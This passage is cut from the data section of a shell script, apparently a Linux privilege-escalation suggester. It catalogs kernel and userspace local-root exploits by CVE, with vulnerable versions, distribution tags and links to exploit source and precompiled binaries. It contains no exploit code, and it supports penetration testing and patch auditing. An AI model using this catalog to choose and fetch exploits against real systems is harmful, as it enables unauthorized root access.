Name: ${txtgrn}[CVE-2012-0056]${txtrst} memodipper
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0
Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)}
Rank: 1
analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/
src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64
exploit-db: 18411
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056,CVE-2010-3849,CVE-2010-3850]${txtrst} full-nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Rank: 1
src-url: http://vulnfactory.org/exploits/full-nelson.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64
exploit-db: 15704
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1858]${txtrst} CLONE_NEWUSER|CLONE_FS
Reqs: pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y
Tags: 
Rank: 1
src-url: http://stealth.openwall.net/xSports/clown-newuser.c
analysis-url: https://lwn.net/Articles/543273/
exploit-db: 38390
author: Sebastian Krahmer
Comments: CONFIG_USER_NS needs to be enabled 
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64
exploit-db: 26131
author: Andrea 'sorbo' Bittau
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent 2
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
src-url: https://cyseclabs.com/exploits/vnik_v1.c
exploit-db: 33589
author: Vitaly 'vnik' Nikolenko
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-0268]${txtrst} msr
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<3.7.6
Tags: 
Rank: 1
exploit-db: 27297
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1959]${txtrst} userns_root_sploit
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.8.9
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1
exploit-db: 25450
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} semtex
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9
Tags: RHEL=6
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
exploit-db: 25444
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=13.10
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64
exploit-db: 31346
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn 2
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
exploit-db: 31347
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0196]${txtrst} rawmodePTY
Reqs: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3
Tags:
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
exploit-db: 33516
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-2851]${txtrst} use-after-free in ping_init_sock() ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.14
Tags: 
Rank: 0
analysis-url: https://cyseclabs.com/page?n=02012016
exploit-db: 32926
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4014]${txtrst} inode_capable
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.13
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4
exploit-db: 33824
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4699]${txtrst} ptrace/sysret
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.8
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16
exploit-db: 34134
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4943]${txtrst} PPPoL2TP ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.2,ver<=3.15.6
Tags: 
Rank: 1
analysis-url: https://cyseclabs.com/page?n=01102015
exploit-db: 36267
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5207]${txtrst} fuse_suid
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1
Tags: 
Rank: 1
exploit-db: 34923
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-9322]${txtrst} BadIRET
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64
Tags: RHEL<=7,fedora=20
Rank: 1
analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
exploit-db:
author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3290]${txtrst} espfix64_NMI
Reqs: pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8
exploit-db: 37722
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} bluetooth
Reqs: pkg=linux-kernel,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 4756
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1328]${txtrst} overlayfs
Reqs: pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/717
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64
exploit-db: 37292
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags:
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39230
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39166
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-0728]${txtrst} keyring
Reqs: pkg=linux-kernel,ver>=3.10,ver<4.4.1
Tags:
Rank: 0
analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exploit-db: 40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-2384]${txtrst} usb-midi
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8
Tags: ubuntu=14.04,fedora=22
Rank: 1
analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
exploit-db: 41999
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4997]${txtrst} target_offset
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
exploit-db: 40049
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4557]${txtrst} double-fdput()
Reqs: pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
exploit-db: 40759
author: Jann Horn
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40611
author: Phil Oester
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow 2
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40839
author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-8655]${txtrst} chocobo_root
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root
exploit-db: 40871
author: rebel
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9793]${txtrst} SO_{SND|RCV}BUFFORCE
Reqs: pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags:
Rank: 1
analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
exploit-db: 41995
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-6074]${txtrst} dccp
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my]
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
exploit-db: 41458
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-7308]${txtrst} af_packet
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit
exploit-db: 41994
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 5
analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out
exploit-db: 45010
author: Rick Larabee
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000112]${txtrst} NETIF_F_UFO
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out
exploit-db:
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000253]${txtrst} PIE_stack_corruption
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Rank: 1
analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
exploit-db: 42887
author: Qualys
Comments:
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-5333]${txtrst} rds_atomic_free_op NULL pointer dereference
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64
Tags: ubuntu=16.04{kernel:4.4.0|4.8.0}
Rank: 1
src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c
Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR.
author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-18955]${txtrst} subuid_shell
Reqs: pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ]
Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
exploit-db: 45886
author: Jann Horn
Comments: CONFIG_USER_NS needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-13272]${txtrst} PTRACE_TRACEME
Reqs: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
exploit-db: 47133
exploit-db: 47163
author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-15666]${txtrst} XFRM_UAF
Reqs: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y
Tags:
Rank: 1
analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-27365]${txtrst} linux-iscsi
Reqs: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y
Tags: RHEL=8
Rank: 1
analysis-url: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
src-url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
author: GRIMM
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3490]${txtrst} eBPF ALU32 bounds tracking for bitwise ops
Reqs: pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Rank: 5
analysis-url: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
src-url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
author: chompie1337
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-22555]${txtrst} Netfilter heap out-of-bounds write
Reqs: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6
Tags: ubuntu=20.04{kernel:5.8.0-*}
Rank: 1
analysis-url: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
src-url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
exploit-db: 50135
author: theflow (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(20.04){kernel:5.12.13}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Rank: 1
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
EOF
)


############ USERSPACE EXPLOITS ###########################
n=0

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0186]${txtrst} samba
Reqs: pkg=samba,ver<=2.2.8
Tags: 
Rank: 1
exploit-db: 23674
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev
Reqs: pkg=udev,ver<141,cmd:[[ -f /etc/udev/rules.d/95-udev-late.rules || -f /lib/udev/rules.d/95-udev-late.rules ]]
Tags: ubuntu=8.10|9.04
Rank: 1
exploit-db: 8572
Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed 
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev 2
Reqs: pkg=udev,ver<141
Tags:
Rank: 1
exploit-db: 8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-0832]${txtrst} PAM MOTD
Reqs: pkg=libpam-modules,ver<=1.1.1
Tags: ubuntu=9.10|10.04
Rank: 1
exploit-db: 14339
Comments: SSH access to non privileged user is needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4170]${txtrst} SystemTap
Reqs: pkg=systemtap,ver<=1.3
Tags: RHEL=5{systemtap:1.1-3.el5},fedora=13{systemtap:1.2-1.fc13}
Rank: 1
author: Tavis Ormandy
exploit-db: 15620
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-1485]${txtrst} pkexec
Reqs: pkg=polkit,ver=0.96
Tags: RHEL=6,ubuntu=10.04|10.10
Rank: 1
exploit-db: 17942
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-2921]${txtrst} ktsuss
Reqs: pkg=ktsuss,ver<=1.4
Tags: sparky=5|6
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2011/08/13/2
src-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2011-2921/ktsuss-lpe.sh
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0809]${txtrst} death_star (sudo)
Reqs: pkg=sudo,ver>=1.8.0,ver<=1.8.3
Tags: fedora=16 
Rank: 1
analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
exploit-db: 18436
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0476]${txtrst} chkrootkit
Reqs: pkg=chkrootkit,ver<0.50
Tags: 
Rank: 1
analysis-url: http://seclists.org/oss-sec/2014/q2/430
exploit-db: 33899
Comments: Rooting depends on the crontab (up to one day of delay)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5119]${txtrst} __gconv_translit_find
Reqs: pkg=glibc|libc6,x86
Tags: debian=6
Rank: 1
analysis-url: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
exploit-db: 34421
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1862]${txtrst} newpid (abrt)
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=20
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3315]${txtrst} raceabrt
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/130
